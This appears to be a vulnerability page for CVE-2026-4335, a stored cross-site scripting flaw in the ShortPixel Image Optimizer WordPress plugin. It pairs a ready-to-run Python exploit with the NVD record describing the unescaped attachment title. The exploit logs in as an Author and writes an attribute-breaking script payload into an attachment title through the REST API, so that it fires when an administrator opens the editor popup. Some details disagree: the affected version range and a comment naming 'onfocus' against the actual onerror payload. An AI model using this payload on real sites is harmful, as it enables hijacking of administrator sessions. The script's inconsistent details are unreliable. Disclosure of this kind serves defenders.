CVE-2026-4335

import requests # Exploit Title: ShortPixel Image Optimizer < 6.4.3 - Stored XSS via Attachment Title # Description: Updates an attachment title to inject XSS into the admin popup # Usage: python poc.py <url> <username> <password> <attachment_id> target_url = "http://target-wordpress-site.com" wp_user = "author" wp_pass = "password" attachment_id = 123 # 1. Authenticate to get a nonce session = requests.Session() login_data = {'log': wp_user, 'pwd': wp_pass, 'wp-submit': 'Log In', 'redirect_to': '%s/wp-admin' % target_url} session.post('%s/wp-login.php' % target_url, data=login_data) # 2. Retrieve a valid REST API nonce (X-WP-Nonce) response = session.get('%s/wp-admin/admin.php?page=shortpixel-images' % target_url) # (In a real scenario, parsing the nonce from the page headers or body is required) # For demonstration, let's assume the REST API is accessible with the auth cookie # and we update the post title directly. # 3. Prepare the Payload # The payload breaks out of the value attribute: value="[PAYLOAD]" # We use a double quote to close the attribute and an onfocus event handler xss_payload = '"><img src=x onerror=alert(document.cookie)><input value="' # 4. Send REST API request to update the attachment title api_endpoint = '%s/wp-json/wp/v2/media/%d' % (target_url, attachment_id) headers = { 'Content-Type': 'application/json' } data = { 'title': xss_payload } # Note: Requires REST API authentication cookie from the session response = session.post(api_endpoint, headers=headers, json=data) if response.status_code == 200: print("Payload injected successfully.") print("An Administrator must now open the ShortPixel AI editor for attachment %d." % attachment_id) else: print("Failed to inject payload.") print(response.text)

{"cve": {"id": "CVE-2026-4335", "sourceIdentifier": "[email protected]", "published": "2026-03-26T04:17:12.810", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ShortPixel Image Optimizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the attachment post_title in all versions up to, and including, 6.4.3. This is due to insufficient output escaping in the getEditorPopup() function and its corresponding media-popup.php template. Specifically, the attachment's post_title is retrieved from the database via get_post() in AjaxController.php (line 435) and passed directly to the view template (line 449), where it is rendered into an HTML input element's value attribute without esc_attr() escaping (media-popup.php line 139). Since WordPress allows Authors to set arbitrary attachment titles (including double-quote characters) via the REST API, a malicious author can craft an attachment title that breaks out of the HTML attribute and injects arbitrary JavaScript event handlers. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts that execute whenever a higher-privileged user (such as an administrator) opens the ShortPixel AI editor popup (Background Removal or Image Upscale) for the poisoned attachment."}, {"lang": "es", "value": "El plugin ShortPixel Image Optimizer para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del post_title del adjunto en todas las versiones hasta la 6.4.3, inclusive. Esto se debe a un escape de salida insuficiente en la función getEditorPopup() y su plantilla media-popup.php correspondiente. Específicamente, el post_title del adjunto se recupera de la base de datos a través de get_post() en AjaxController.php (línea 435) y se pasa directamente a la plantilla de vista (línea 449), donde se renderiza en el atributo 'value' de un elemento de entrada HTML sin el escape esc_attr() (media-popup.php línea 139). Dado que WordPress permite a los autores establecer títulos de adjuntos arbitrarios (incluyendo caracteres de comillas dobles) a través de la API REST, un autor malicioso puede crear un título de adjunto que se escapa del atributo HTML e inyecta controladores de eventos JavaScript arbitrarios. Esto hace posible que atacantes autenticados, con acceso de nivel de Autor o superior, inyecten scripts web arbitrarios que se ejecutan cada vez que un usuario con mayores privilegios (como un administrador) abre la ventana emergente del editor de IA de ShortPixel (Eliminación de Fondo o Escalado de Imagen) para el adjunto envenenado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/tags/6.4.3/class/Controller/AjaxController.php#L449", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/tags/6.4.3/class/view/snippets/media-popup.php#L139", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/trunk/class/Controller/AjaxController.php#L449", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/trunk/class/view/snippets/media-popup.php#L139", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3490270%40shortpixel-image-optimiser&new=3490270%40shortpixel-image-optimiser&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a156234f-2644-4d17-aaa5-4f088cf48f73?source=cve", "source": "[email protected]"}]}}